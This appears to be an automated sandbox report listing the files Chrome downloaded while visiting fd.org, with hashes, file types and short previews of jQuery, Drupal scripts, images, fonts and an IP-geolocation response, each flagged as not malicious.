                                          SHA1:3A1F8BE171C229C9DCE8E38A859D89022F96B483
                                          SHA-256:DDAF063156933FBA6DC9A63C583F6CF2957301721EED1CF5029CD8AC7B75C3F6
                                          SHA-512:23111B2303A1136BCFCC775F19CA6E7028F9C684D8FA264AF9164977BBE14DA758560DBBFAEBD2EEBB6AD713E6BE91332ADDD6D085EF286DC64C0685FCBE92BF
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/js/js_3a8GMVaTP7ptyaY8WD9s8pVzAXIe7Rz1ApzYrHt1w_Y.js
                                          Preview:/**. * @file. * Some basic behaviors and utility functions for Views.. */.(function ($) {.. Drupal.Views = {};.. /**. * JQuery UI tabs, Views integration component.. */. Drupal.behaviors.viewsTabs = {. attach: function (context) {. if ($.viewsUi && $.viewsUi.tabs) {. $('#views-tabset').once('views-processed').viewsTabs({. selectedClass: 'active'. });. }.. $('a.views-remove-link').once('views-processed').click(function(event) {. var id = $(this).attr('id').replace('views-remove-link-', '');. $('#views-row-' + id).hide();. $('#views-removed-' + id).get(0).checked = true;. event.preventDefault();. });. // Here is to handle display deletion. // (checking in the hidden checkbox and hiding out the row).. $('a.display-remove-link'). .addClass('display-processed'). .click(function() {. var id = $(this).attr('id').replace('display-remove-link-', '');. $('#display-row-'
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 1 x 1
                                          Category:downloaded
                                          Size (bytes):49
                                          Entropy (8bit):3.0021975300504877
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ED280A0EA3CC38F3CBBC747ACFBEF47D
                                          SHA1:6BDCB32EE75E957A5085C010F4DFD0C716BFDADC
                                          SHA-256:8F69E10876805B747A3AD08A818D46AC7E731B1AF417EA6E259D9B6B7DEB65C5
                                          SHA-512:4248E293BB759C3AC0EA71F545E10E85D0C3C7F1237CE8B18C6A3FD00499A11BDC0252C938BE87359FA673C8E7A83C7CC6FC5D12718A68844C2615E5DCA3527B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/transparent_pixel.gif
                                          Preview:GIF89a...................!.......,...........T..;
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 300x130, components 3
                                          Category:dropped
                                          Size (bytes):21177
                                          Entropy (8bit):7.962240117802056
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E91E338528EBB490B2635AFB3CFECBE9
                                          SHA1:E957FAE5B8DD7B5D5C0EA2A423606A3A3244CC9D
                                          SHA-256:27B5074EDCA09CFB67D5D198A176A6D25E5F1F669E4CC322624EE52C1C2F089B
                                          SHA-512:04DBB8548D93E578768872CCF779A25BC359FBF603771F9A080211F7559E016B2678120694229E99A97B154617A430209D0969F08EFD45485276A7AB04BC93DE
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:E43EF742E25011E6AFEBEEDDC303B58D" xmpMM:InstanceID="xmp.iid:E43EF741E25011E6AFEBEEDDC303B58D" xmp:CreatorTool="Adobe Photoshop CC 2015.5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="D96E10702F709A1BAB529D02B734515C" stRef:documentID="D96E10702F709A1BAB529D02B734515C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=12, height=100, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=250], baseline, precision 8, 250x80, components 3
                                          Category:downloaded
                                          Size (bytes):21549
                                          Entropy (8bit):7.352602848437425
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4CB343EF464C71A8074500450D009171
                                          SHA1:896F214CBBAF2CB77EF06FACF5F3DB16B254A2FA
                                          SHA-256:2D9A4A920CC82307E90A07F2809316E8875FB2B52E728334E19D3435E470982C
                                          SHA-512:D60C5BB29F79661099765B2600DDB8E5DEF589530B75392E317DE330671D456CB90FD78DCFA309C7DD8ABEEA4C30588031AAB5C8ECD4477A96E29658ECFC46B5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/callus.jpg
                                          Preview:.....BExif..II*...........................d...........................................................................(...........1...$.......2...........i...........$..............'.......'..Adobe Photoshop CC 2015.5 (Windows).2016:09:30 14:57:22...........0221................................P...............................r...........z...(.......................................H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................3...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)S...t....;...ks...X....mv..=...1.r.>n&+C...k........k7nIM.....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (1141)
                                          Category:dropped
                                          Size (bytes):23601
                                          Entropy (8bit):4.829396489839887
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4B060D0DDAB56DD4362A6FE4E32DCF98
                                          SHA1:BCC7E7EF3F9C4DBDFCFDF4AF0DF52BA6283953A5
                                          SHA-256:4B63F89027F5502B828A4F20860842642B4ACA3CC7FD48C953DA5F67F57510EE
                                          SHA-512:78AF75833BF6D47F1CF40C32B21F2044C8A71D33980DF713A07D506FAF3F6E17ACDB902F9AABEEF4B636C3299A2CF35B65F09A74E312BA918C522989CCD2E73A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(function ($) {../**. * Toggle the visibility of a fieldset using smooth animations.. */.Drupal.toggleFieldset = function (fieldset) {. var $fieldset = $(fieldset);. if ($fieldset.is('.collapsed')) {. var $content = $('> .fieldset-wrapper', fieldset).hide();. $fieldset. .removeClass('collapsed'). .trigger({ type: 'collapsed', value: false }). .find('> legend span.fieldset-legend-prefix').html(Drupal.t('Hide'));. $content.slideDown({. duration: 'fast',. easing: 'linear',. complete: function () {. Drupal.collapseScrollIntoView(fieldset);. fieldset.animating = false;. },. step: function () {. // Scroll the fieldset into view.. Drupal.collapseScrollIntoView(fieldset);. }. });. }. else {. $fieldset.trigger({ type: 'collapsed', value: true });. $('> .fieldset-wrapper', fieldset).slideUp('fast', function () {. $fieldset. .addClass('collapsed'). .find('> legend span.fieldset-legend
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (6656), with CRLF, LF line terminators
                                          Category:downloaded
                                          Size (bytes):39078
                                          Entropy (8bit):5.126180483105801
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9C9BA6198B05A5B2D1BADB3BA63852BF
                                          SHA1:C82CABA4FB962B269AD5BB353AE4B96176EFE50C
                                          SHA-256:188C378B1B34F88A94860245ADA2DE1190C7C9F6B25DE2F85813CFD28BB642CE
                                          SHA-512:2F4CA8D5E70E926C8D2C0E072E0D35ABEC888B096567922651FF831F7E92419D3975477948223585173F7D0F854E962219466345C5D2B1669FF72C7BC2DE101E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/
                                          Preview:<!DOCTYPE html>. [if IEMobile 7]><html class="no-js ie iem7" lang="en" dir="ltr"><![endif]-->. [if lte IE 6]><html class="no-js ie lt-ie9 lt-ie8 lt-ie7" lang="en" dir="ltr"><![endif]-->. [if (IE 7)&(!IEMobile)]><html class="no-js ie lt-ie9 lt-ie8" lang="en" dir="ltr"><![endif]-->. [if IE 8]><html class="no-js ie lt-ie9" lang="en" dir="ltr"><![endif]-->. [if (gte IE 9)|(gt IEMobile 7)]><html class="no-js ie" lang="en" dir="ltr"><![endif]-->. [if !IE]> ><html class="no-js" lang="en" dir="ltr"> <![endif]-->.<head>. <meta charset="utf-8" />.<meta name="Generator" content="Drupal 7 (http://drupal.org)" />.<link rel="shortcut icon" href="https://www.fd.org/sites/all/themes/om_fd/favicon.ico" type="image/vnd.microsoft.icon" />.<link rel="profile" href="http://www.w3.org/1999/xhtml/vocab" />.<meta name="HandheldFriendly" content="true" />.<meta name="MobileOptimized" content="width" />.<meta http-equiv="cleartype" content="on" />.<link rel="apple-touch-icon
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32030)
                                          Category:downloaded
                                          Size (bytes):86709
                                          Entropy (8bit):5.367391365596119
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E071ABDA8FE61194711CFC2AB99FE104
                                          SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                          SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                          SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.1.1.min.js
                                          Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text
                                          Category:dropped
                                          Size (bytes):4646
                                          Entropy (8bit):4.763724174971068
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6DADB4D24819DF9F741333CCDB595B9B
                                          SHA1:F9DE4604DCF4BBFAF69C4759428356A64155BC82
                                          SHA-256:5FB4B55621887731913F107F3EEE83F1C67330A66CAA978498709837D8306023
                                          SHA-512:E109848200B03EC8EE97631516D8B93BE586A9257F8EAD046BF08E860725A0D5304B89931D126334F7BF118762D3126D403C465FA843F2ECA44A84BB2BDE131F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:(function ($) {.. /**. * The recommended way for producing HTML markup through JavaScript is to write. * theming functions. These are similiar to the theming functions that you might. * know from 'phptemplate' (the default PHP templating engine used by most. * Drupal themes including Omega). JavaScript theme functions accept arguments. * and can be overriden by sub-themes.. *. * In most cases, there is no good reason to NOT wrap your markup producing. * JavaScript in a theme function.. */. Drupal.theme.prototype.omFdExampleButton = function (path, title) {. // Create an anchor element with jQuery.. return $('<a href="' + path + '" title="' + title + '">' + title + '</a>');. };.. /**. * Behaviors are Drupal's way of applying JavaScript to a page. In short, the. * advantage of Behaviors over a simple 'document.ready()' lies in how it. * interacts with content loaded through Ajax. Opposed to the. * 'document.ready()' event which is only fired once when
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:downloaded
                                          Size (bytes):1350
                                          Entropy (8bit):5.437574579461789
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:048827075038BB29A926100FAC103075
                                          SHA1:344B5CF6498867A1806DB0287F339B12C00F34B5
                                          SHA-256:88F23B85D81514D63DA43985D4E8BE67C1D4235E42768EBDC3783F88FB36C1E0
                                          SHA-512:CFFBB765A48E681EAF3D11CA60999C4886A2CD88CCFCA7B6260AECD880B17ED2764568418D6D4086049D6E0F296BAF33E8F8979017541877F0D96B1AF6A16C6E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap
                                          Preview:/* vietnamese */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rHmsJCQ.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/archivonarrow/v30/tss5ApVBdCYD5Q7hcxTE1ArZ0Zz8oY2KRmwvKhhvLFG6rXmsJCQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Archivo Narrow';. font-style: normal;. font-weight
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (5945)
                                          Category:dropped
                                          Size (bytes):284493
                                          Entropy (8bit):5.589354118723004
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:7FD3F3BC533530767321D6603F079D79
                                          SHA1:3CC4508EEB47ED962606301A3DC1742CDCA2923C
                                          SHA-256:4612A49D83E8B5FE3C32020700ABBABCB25567B4E2D5F29C5B0E7DC17EE0B841
                                          SHA-512:48029AB9C119303D0CE1336BADCB22127EB15F59E91030A14411C5BBF6B5B54106CCB10340F4F92F7C98FF7C1856FBC5AF377BCB82B6C7429FB0D7A262A232A3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":6,"vtp_value":true,"tag_id":10},{"function":"__ogt_referral_exclusion","priority":6,"vtp_includeConditions":["list","fd\\.org"],"tag_id":12},{"function":"__ogt_session_timeout","priority":6,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text
                                          Category:dropped
                                          Size (bytes):271751
                                          Entropy (8bit):5.0685414131801165
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                          SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                          SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                          SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 400x250, components 3
                                          Category:dropped
                                          Size (bytes):27074
                                          Entropy (8bit):7.947653280529302
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:91695ABFA7AA3BFC1D950D5C24957F67
                                          SHA1:7D4AFD699F5350FAF59FA7B19EA530B8C750F18E
                                          SHA-256:2C2C5CDB12963E8DC51AAA26180D45247C3E153A46000D15C6701399A301C930
                                          SHA-512:2376B49FF1736C7B6A257F2D7DE321C289140624A299BC75BE93B596DDDC84348CF54622F95BDB6B75BAB9B63609F23FD1EDBDB1BE16C70A172BEC413E6C1C31
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:......JFIF.....d.d......Ducky.......<......Adobe.d............................................................................................................................................................................................................................................!..1.A".Qaq..2B#...Rbr..3s.67....CS.$4t..u....c...DT.%&F.......................!1.AQaq"2....3..B.....R#..b............?...@(......P..@(........!.0n. ...&..Y(..G...>....v.tZ...t..No.J2Inb8.If#..H.. ...."(...j......jG..D.>v:.'...w.m.h.~h..w.a..Je...u.P.6...-.{..g.rS...3.0.xE....Ui.%......C{._n.....aerU...D....].Hl.(.:.L. z.<J..J..MU~..R....j.z.l.h.|kS..)..."8..4.f.....![*..T'...e.:...".P..@(......P..@(......P..@(......P..@(......P..@(.........8.<$.S..q..H....J=m.T..W...J..+.fsMbVh.qsQ...2.9.....@..{..RU@%D_..V...*.|.)E%]....C....1Y.J...q....Sl..^....K.m.&..Z.....+}...x..d.bf$....&d..."....h.t..dB`....*...)M.B...)M.C.....2C.y..N....8`...e.e...q...E...^..RT.'...c.r).l..9...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32077)
                                          Category:downloaded
                                          Size (bytes):97163
                                          Entropy (8bit):5.373204330051448
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4F252523D4AF0B478C810C2547A63E19
                                          SHA1:5A9DCFBEF655A2668E78BAEBEAA8DC6F41D8DABB
                                          SHA-256:668B046D12DB350CCBA6728890476B3EFEE53B2F42DBB84743E5E9F1AE0CC404
                                          SHA-512:8C6B0C1FCDE829EF5AB02A643959019D4AC30D3A7CC25F9A7640760FEFFF26D9713B84AB2E825D85B3B2B08150265A10143F82E05975ACCB10645EFA26357479
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-1.12.4.min.js
                                          Preview:/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.ca
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 465 x 270, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):38023
                                          Entropy (8bit):7.9544170778453
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:161412C527A3D7BB6A68EDE3788A1070
                                          SHA1:7DCBEFF5DC8C30BCFEFD9A49A30BBAFAA2C26691
                                          SHA-256:963E898F622E1F2C70F6AD534A502CCBDB0017ED5F7436C2BFF562321F8D100B
                                          SHA-512:53C01BAD512F5C336DE6DD05916ABCF4B5CDB4DEFF078DEDBB31D10D40258BF11CD7EE5E69A37C2B6573E9E3A36295D85C508E4575ABFD294E83EF83CAA5890A
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR.............Y.6....pHYs............e....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a6396, 2024/03/12-07:48:23 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreateDate="2023-01-02T18:26:16-05:00" xmp:ModifyDate="2024-11-11T15:59:41-05:00" xmp:MetadataDate="2024-11-11T15:59:41-05:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:1298bbee-592d-a94a-bc1f-c949c9b8cd6a" xmpMM:DocumentID="adobe:docid:photoshop:fbfae4ab-d2cc-a84e-8b85-927d7c0cd18a" xmpMM:OriginalDocumentID="xmp.did:03dc0e2b-59d2-3645-9ef7-9e32d1696775"> <xmpMM:History>
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):28
                                          Entropy (8bit):4.137537511266052
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AC2ACA9EAA84E1DEADB8507B24896865
                                          SHA1:39FEEC029B369917D2897C95FD450FF9EA64D08F
                                          SHA-256:881851041A64BE06D8BAFCFD2D1DD85F071FCD755178B529420DC5858141EF44
                                          SHA-512:A5389EDD199E38F65D350C560C8AC85545321FC4F169841F29F55CE3293C0C7454D38A709942235A3010EAAB91B99758CD5350629331AB0286BADBC9E4BFAD65
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkQwfbW76XNfhIFDVNVgbUSBQ2MV9u3?alt=proto
                                          Preview:ChIKBw1TVYG1GgAKBw2MV9u3GgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (16256)
                                          Category:downloaded
                                          Size (bytes):70100
                                          Entropy (8bit):5.058462583756046
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:563B5FED9548DD30891E7154CAC8C741
                                          SHA1:5A5E8929F15C121804F1F75A175DEB0B66154A90
                                          SHA-256:BB78BABB4B34264966F2C0929F77FC8292FD71F585A7B9D4C440C0309DBB6813
                                          SHA-512:FD6EA3F37EADDCEB6F08233C7E25E6380BCAC19FFF613CC9E158D235258B5E5B3F7A86267394EF9600CA5B53CE7B9314371B1BC0902E0F132ECE60F5A75E3D72
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/js/js_u3i6u0s0Jklm8sCSn3f8gpL9cfWFp7nUxEDAMJ27aBM.js
                                          Preview:/*jslint browser: true */ /*global jQuery: true */../**. * jQuery Cookie plugin. *. * Copyright (c) 2010 Klaus Hartl (stilbuero.de). * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. */..// TODO JsDoc../**. * Create a cookie with the given key and value and other optional parameters.. *. * @example $.cookie('the_cookie', 'the_value');. * @desc Set the value of a cookie.. * @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });. * @desc Create a cookie with all available options.. * @example $.cookie('the_cookie', 'the_value');. * @desc Create a session cookie.. * @example $.cookie('the_cookie', null);. * @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain. * used when the cookie was set.. *. * @param String key The key of the cookie.. * @param String value The value of the cooki
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                          Category:dropped
                                          Size (bytes):1150
                                          Entropy (8bit):4.641965347231238
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:27AB981E4B9D44480B31C60C162B3DDA
                                          SHA1:04A656A884102806F4C21A9CB258E1CC2F1206B8
                                          SHA-256:867A713CE14B88A30A4AA49F784194F85B2AC0C17BC868CF74C16588BF5CCA77
                                          SHA-512:6084FF3587B96BEE868A5A4EEE7699B3DD258EA36B14AC1CEE03086A47E1E309AF457F57F07AD1D2F364881F2EC2F45FA03482F49A93EEEBF34978DFFB4D0711
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:............ .h.......(....... ..... .....................................................................................................3.k................................................................H3y.`N...w..............................................................*$6.4,D.@9L.J9k.^J..........................................................1.i.vf..............................VB..........................L9|.E3{.............................]K..........................H4|.-.i..........................}..eU..........................5.m.$.c..........................x..VC..........................N:..,.i............................./.j.........................K8y...\...............................Y.............................@(s.............................[H..7 m.........324.DDE.CE@..w...........p............................].aR..............................................................!._.G4|.............................................................iW..(.c.L8|..n........
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:downloaded
                                          Size (bytes):321
                                          Entropy (8bit):4.982434990202744
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6B7A647D1B9880C6686665F8D0AE141A
                                          SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                          SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                          SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ipinfo.io/json
                                          Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):80
                                          Entropy (8bit):4.519265602280304
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3FA187421B5A45709B21C348556B4A6A
                                          SHA1:F44809B9AAA680AE2BD9952DEEE31F85FED9FFB1
                                          SHA-256:BADDE82FD2CA7C7B153EC29AAABD4E9A370A953FF2C0591DFB19B4521D4AE518
                                          SHA-512:7C738A42C954A55E718266CA0868870E6F87E9676298E1A488F14DFC546FC5E69EAA3069CA452C9AA6DAA2B7EC431FF51A82566A2EDD177C1180E9631802A6C2
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:{"ok":false,"error_code":400,"description":"Bad Request: message text is empty"}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (5168)
                                          Category:downloaded
                                          Size (bytes):13348
                                          Entropy (8bit):4.993047713502715
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ED10706A13EC10D7E3D06F3CBC09117B
                                          SHA1:4BB49097A8E1435513D701604D6527575FFF7133
                                          SHA-256:40265E00AD3260502227B9841F4D68613E921ED4BA042131B0444C6E5E0528E2
                                          SHA-512:9BCF2EB4FFFF6C8D320DDBE816BD162CA34B234BEDF750FAB0B9C2A318456AD41D2C4E71805596BA97077AC307C2DB5E10D322D0B05650B456BD02C0943C9507
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.fd.org/sites/default/files/css/css_QCZeAK0yYFAiJ7mEH01oYT6SHtS6BCExsERMbl4FKOI.css
